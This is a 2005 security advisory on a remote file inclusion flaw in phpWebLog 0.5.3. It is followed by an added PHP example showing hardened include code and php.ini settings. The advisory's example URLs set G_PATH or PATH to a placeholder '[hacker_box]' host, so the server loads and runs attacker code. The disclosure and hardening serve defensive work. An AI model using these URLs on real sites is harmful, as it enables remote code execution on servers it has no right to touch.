packetstorm | Filip Groszynski | PACKETSTORM:36514
History: Mar 15, 2005 - 12:00 a.m.

phpweblog053.txt

2005-03-15 00:00:00
Filip Groszynski
packetstormsecurity.com
`  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: phpWebLog  
Version: <= 0.5.3  
Homepage: http://phpweblog.org/  
  
Author: Filip Groszynski (VXSfx)  
Date: 7 March 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Vulnerable code in include/init.inc.php:  
  
...  
# Allowed HTML tags in stories, comma seperated  
$G_HTML = "<a>,<i>,<b>,<u>,<li>,<p>,<code>,<tt>,<blockquote>";  
  
# Are we developing?  
$G_DEBUG = false;  
  
# Number of seconds to hold cache  
$G_CACHE = 10;  
  
# phpWebLog version  
$G_VER = "0.5.3";  
  
...  
/*== include libraries/functions =========================================*/  
  
include_once("$G_PATH/include/func.inc.php");  
include_once("$G_PATH/include/cache.inc.php");  
include_once("$G_PATH/include/blocks.inc.php");  
include_once("$G_PATH/include/layout.inc.php");  
include_once("$G_PATH/include/parser.inc.php");  
include_once("$G_PATH/include/search.inc.php");  
include_once("$G_PATH/include/comments.inc.php");  
....  
  
--------------------------------------------------------  
  
Vulnerable code in backend/addons/links/index.php:  
  
# Original links code written by Twyst (http://anime-central.net)  
# Modified for use with phpWebLog by Jason Hines  
# Thanks Twyst!  
  
include_once($PATH . "/functions.php");  
....  
  
--------------------------------------------------------  
  
Example:  
  
if register_globals=on and allow_url_fopen=on:  
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/  
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/  
  
--------------------------------------------------------  
  
Vendor status:  
  
Vendor has been notified.  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <at> gmail <dot> com  
HP: http://shell.homeunix.org  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`
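
Both files build an include path from a variable they never assign, so with register_globals on the request supplies it. The block below is an added example of a hardened include prologue, not code from phpWebLog or from the advisory; the `APP_ENTRY` constant and the allow-list loop are assumptions made for illustration.

```php
<?php
// Added example, not phpWebLog code: hardened start of an include file
// such as include/init.inc.php.
// php.ini settings that remove the precondition named in the advisory:
//   register_globals  = Off
//   allow_url_fopen   = Off   (if the application does not need it)
//   allow_url_include = Off   (separate directive since PHP 5.2)

// APP_ENTRY is a hypothetical constant that the real entry script defines
// before including this file; a direct HTTP request to this file lacks it.
if (!defined('APP_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// Assign the base path unconditionally from this file's location on disk.
// This overwrites any G_PATH value that register_globals created from the
// query string before the script started.
$G_PATH = realpath(dirname(__FILE__) . '/..');
if ($G_PATH === false) {
    exit('Cannot resolve application root');
}
$root = rtrim($G_PATH, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

// Fixed allow-list of libraries, taken from the include_once lines above.
$libs = array('func', 'cache', 'blocks', 'layout', 'parser', 'search', 'comments');

foreach ($libs as $lib) {
    // realpath() returns false for missing files and resolves ../ and
    // symlinks, so the prefix check below compares canonical local paths.
    $target = realpath($root . 'include' . DIRECTORY_SEPARATOR . $lib . '.inc.php');
    if ($target === false || strncmp($target, $root, strlen($root)) !== 0 || !is_file($target)) {
        exit('Rejected include path');
    }
    // Included at file scope so the libraries' globals stay global.
    include_once $target;
}
```

The same pattern applies to `$PATH` in backend/addons/links/index.php: assign it from the file's own location before the first include instead of relying on the caller to have set it.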